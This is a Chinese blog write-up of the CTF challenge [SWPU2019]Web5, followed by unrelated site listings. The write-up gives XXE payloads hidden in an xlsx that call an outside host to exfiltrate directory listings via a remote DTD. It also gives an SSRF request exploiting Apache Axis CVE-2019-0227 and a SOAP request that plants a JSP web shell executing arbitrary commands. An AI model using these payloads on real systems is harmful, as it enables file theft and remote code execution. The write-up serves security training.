[SWPU2019]Web5

最新推荐文章于 2022-10-31 14:25:46 发布
最新推荐文章于 2022-10-31 14:25:46 发布
阅读量675 收藏 1
点赞数
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/122692854
版权

[SWPU2019]Web5

题目给了个导入导出通讯录的功能,导出为xlsx文件,所以猜测是解析excel引起的xxe

验证一下

对[Content_Types].xml写入poc之后再压缩回去

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANYTHING [
<!ENTITY % test SYSTEM "http://124.70.40.5:1234">
%test;

1643111589126.png

验证了xxe存在.无法直接读flag,利用java的file协议列目录,没回显的xxe。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % fmyyy SYSTEM "http://124.70.40.5/evil.dtd">
%fmyyy;
]>

evil.dtd内容

<!ENTITY % file SYSTEM "file:ctffffff/backups">
<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://124.70.40.5:1234/?%file;'> ">
%dtd;
%xxe;

1643114264023.png

看到备份目录,下载。/ctffffff/backups/backup-af7f385c8840f173779124df915b6ebb.zip

1643116574890.png

读web.xml看到注册了FlagServlet,但没有权限读/flag

1643116937583.png

1643116984648.png

看到axis,查看其版本信息

1643116611282.png

该版本正好有个RCE

CVE-2019-0227

https://paper.seebug.org/1489/#141-rceservicehandler

这里的post请求包无法打通,因为这洞有前提条件,但xxe可以进行ssrf,尝试get的请求,用文章里第一个就行,路径得改成axis/shell.jsp

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % fmyyy SYSTEM "http://127.0.0.1:8080/axis/services/AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22randomBBB%22%20provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler%20type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22%20%3E%3Cparameter%20name%3D%22LogHandler.fileName%22%20value%3D%22..%2Fwebapps%2Faxis%2Fshell.jsp%22%20%2F%3E%3Cparameter%20name%3D%22LogHandler.writeToConsole%22%20value%3D%22false%22%20%2F%3E%3C%2Fhandler%3E%3C%2FrequestFlow%3E%3Cparameter%20name%3D%22className%22%20value%3D%22java.util.Random%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22*%22%20%2F%3E%3C%2Fservice%3E%3C%2Fdeployment">
%fmyyy;
]>

1643118531514.png

访问看见服务成功开启

然后post /axis/services/randomBBB(这里路径对应上面开启的服务名)

POST /axis/services/randomBBB HTTP/1.1
Host: 19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml
SOAPAction: something
Content-Length: 874
Origin: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81
Connection: close
Referer: http://19d5d55d-6db4-4ac4-ab93-d0f1debc8c0f.node4.buuoj.cn:81/axis/services/AdminService
Cookie: __gads=ID=df4db7075da356b3-22a4b6a235c800b4:T=1620812094:RT=1620812094:S=ALNI_MbStkXgvBJ8Ws8Umu-eWCgWwB0rTw; UM_distinctid=17cb52e2bac47c-0b11a0162b7f1d-455e6d-1fa400-17cb52e2bad4d8
Upgrade-Insecure-Requests: 1

<?xml version="1.0" encoding="utf-8"?>
        <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Body>
        <api:main
        soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <api:in0><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]>
            </api:in0>
        </api:main>
  </soapenv:Body>
</soapenv:Envelope>

1643119208454.png

fmyyy1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web5-HTTP/HTTPS
growing_duck的博客
11-01 1772
http 和 https解析
[SWPU2019]Web6
lllffg的博客
03-16 734
[SWPU2019]Web6 SQL注入中的with rollup 利用session.upload_progress进行文件包含和反序列化渗透 一个登陆页面,尝试一下1’ and sleep(4)#后弹出被过滤的回显,然后怎么都没思路,然后输入了下万能密码1’ or 1=1 or ‘1’='1,回显了passwd错误,这证明只对passwd进行的检测 看了下wp 猜测源码太狠了 $sql="select * from users where username='$name' and passwd='$
CellWeb5.cab
09-23
用友华表的Cell cab包,用于报表制作,或样式打印
SWPUCTF2019web题复现
bmth666的博客
04-05 1286
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
BUUCTF:[SWPU2019]Web3
末初的CSDN博客
04-21 1579
参考:https://www.leavesongs.com/PENETRATION/client-session-security.html http://forever404.cn/2019/12/14/SWPU2019web%E5%A4%8D%E7%8E%B0/ 点击upload有权限设置,猜测cookie伪造 权限不够,查看session 使用P师傅的脚本可以解这个session...
[SWPU2019]Web1
weixin_43940853的博客
01-15 2979
这是一个留言板的二次注入 当时自己用的是报错注入,结果并没有做出来,看其他人的wp用的是union注入,并且有22个字段
[BUUCTF][SWPU2019]Web1
朋克归零膏的博客
10-28 598
无列名注入fuzz过滤词绕过空格。
SWPU2019 Web1(无列名注入、MariaDB)
weixin_52780973的博客
10-31 1014
sql注入、无列名注入、MariaDB
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4002
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
SWPUCTF web 部分题解
a3320315的博客
01-01 1143
0x01 web1 easyweb 随便注册个账号登陆后,测试发现留言处的title字段存在二次注入 有报错和回显,但是报错过滤了extractvalue和updatexml 考虑使用union,但是过滤了or,不能使用information_schema 对于mysql>5.7的版本,有sys数据库,前提是root权限才能访问 innodb_index_stats和innodb_tab...
javaWeb-5-文件上传与文件下载
风暴计划
12-20 376
目录 1、文件上传 1.1 文件上传的步骤 1.2 文件上传的代码演示-项目结构 1.2.1 编写一个前端页面用于上传操作:upload.html 1.2.2 编写一个后端动态资源处理器:UploadServlet 1.2.3 配置web.xml文件中的动态资源访问路径 1.2.4 文件上传测试 1.2.2-1 文件上传时客户端发送的HTTP协议内容格式 1.2.2-2 文件上传时需要使用的jar包说明: commons-fileupload常用API 2、文件下载 2.1 文件下载整
Mnist数据集,用于人工智能相关基础模型的学习及编程练习
09-06
Mnist数据集,用于人工智能相关基础模型的学习及编程练习
水空两用无人机动力系统设计与研究.pdf
09-06
水空两用无人机动力系统设计与研究.pdf
大神asp新闻发布系统毕业课程设计项目+论文
09-06
编号:55 摘要:随着计算机技术的广泛应用,在新闻发布中引入计算机管理技术,成为一个值得深入研究的问题。本系统采用ASP+ACCESS作为开发环境,本文首先概要的论述了ASP的有关知识与现状,之后,对本系统作了系统的描述,在此基础上,对系统的总体框架和数据库进行了设计,然后,对开发一个小型的新闻信息发布管理系统的各个关键模块实现进行了详细说明。 关键词: 新闻发布,新闻管理,asp,access 目 录 第一章 前 言 1 第二章 系统概述 2 2.1 开发背景 2 2.2 可行性分析 2 2.3 需求分析 3 2.4 asp技术概述 3 2.4.1 ASP的特点 3 2.4.2 ASP的工作原理 4 2.4.3 ASP环境的安装与配置 5 2.5 Access 2003 数据库工具概述 5 2.5.1选择Access2003 作为后台数据库 6 2.5.2 ADO开发数据库 6 第三章 总体设计 8 3.1 系统总体功能设计 8 3.2 系统数据库设计 9 3.2.1 超级管理员表(admin表)设计 9 3.2.2 新闻信息表(news表)设计 10 3.2.3 新闻栏目表(
矫正图像带的旋转角度信息和目标检测标签坐标也随之改变.zip
09-06
1 目标检测的定义 目标检测(Object Detection)的任务是找出图像中所有感兴趣的目标(物体),确定它们的类别和位置,是计算机视觉领域的核心问题之一。由于各类物体有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具有挑战性的问题。 目标检测任务可分为两个关键的子任务,目标定位和目标分类。首先检测图像中目标的位置(目标定位),然后给出每个目标的具体类别(目标分类)。输出结果是一个边界框(称为Bounding-box,一般形式为(x1,y1,x2,y2),表示框的左上角坐标和右下角坐标),一个置信度分数(Confidence Score),表示边界框中是否包含检测对象的概率和各个类别的概率(首先得到类别概率,经过Softmax可得到类别标签)。 1.1 Two stage方法 目前主流的基于深度学习的目标检测算法主要分为两类:Two stage和One stage。Two stage方法将目标检测过程分为两个阶段。第一个阶段是 Region Proposal 生成阶段,主要用于生成潜在的目标候选框(Bounding-box proposals)。这个阶段通常使用卷积神经网络(CNN)从输入图像中提取特征,然后通过一些技巧(如选择性搜索)来生成候选框。第二个阶段是分类和位置精修阶段,将第一个阶段生成的候选框输入到另一个 CNN 中进行分类,并根据分类结果对候选框的位置进行微调。Two stage 方法的优点是准确度较高,缺点是速度相对较慢。 常见Tow stage目标检测算法有:R-CNN系列、SPPNet等。 1.2 One stage方法 One stage方法直接利用模型提取特征值,并利用这些特征值进行目标的分类和定位,不需要生成Region Proposal。这种方法的优点是速度快,因为省略了Region Proposal生成的过程。One stage方法的缺点是准确度相对较低,因为它没有对潜在的目标进行预先筛选。 常见的One stage目标检测算法有:YOLO系列、SSD系列和RetinaNet等。 2 常见名词解释 2.1 NMS(Non-Maximum Suppression) 目标检测模型一般会给出目标的多个预测边界框,对成百上千的预测边界框都进行调整肯定是不可行的,需要对这些结果先进行一个大体的挑选。NMS称为非极大值抑制,作用是从众多预测边界框中挑选出最具代表性的结果,这样可以加快算法效率,其主要流程如下: 设定一个置信度分数阈值,将置信度分数小于阈值的直接过滤掉 将剩下框的置信度分数从大到小排序,选中值最大的框 遍历其余的框,如果和当前框的重叠面积(IOU)大于设定的阈值(一般为0.7),就将框删除(超过设定阈值,认为两个框的里面的物体属于同一个类别) 从未处理的框中继续选一个置信度分数最大的,重复上述过程,直至所有框处理完毕 2.2 IoU(Intersection over Union) 定义了两个边界框的重叠度,当预测边界框和真实边界框差异很小时,或重叠度很大时,表示模型产生的预测边界框很准确。边界框A、B的IOU计算公式为: 2.3 mAP(mean Average Precision) mAP即均值平均精度,是评估目标检测模型效果的最重要指标,这个值介于0到1之间,且越大越好。mAP是AP(Average Precision)的平均值,那么首先需要了解AP的概念。想要了解AP的概念,还要首先了解目标检测中Precision和Recall的概念。 首先我们设置置信度阈值(Confidence Threshold)和IoU阈值(一般设置为0.5,也会衡量0.75以及0.9的mAP值): 当一个预测边界框被认为是True Positive(TP)时,需要同时满足下面三个条件: Confidence Score > Confidence Threshold 预测类别匹配真实值(Ground truth)的类别 预测边界框的IoU大于设定的IoU阈值 不满足条件2或条件3,则认为是False Positive(FP)。当对应同一个真值有多个预测结果时,只有最高置信度分数的预测结果被认为是True Positive,其余被认为是False Positive。 Precision和Recall的概念如下图所示: Precision表示TP与预测边界框数量的比值 Recall表示TP与真实边界框数量的比值 改变不同的置信度阈值,可以获得多组Precision和Recall,Recall放X轴,Precision放Y轴,可以画出一个Precision-Recall曲线,简称P-R
技术方案资料技术方案资料PCB设计高级教程资料.zip
最新发布
09-06
技术方案资料技术方案资料PCB设计高级教程资料.zip
8051Proteus仿真c源码用定时器T0的中断实现长时间定时
09-06
8051Proteus仿真c源码用定时器T0的中断实现长时间定时提取方式是百度网盘分享地址
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值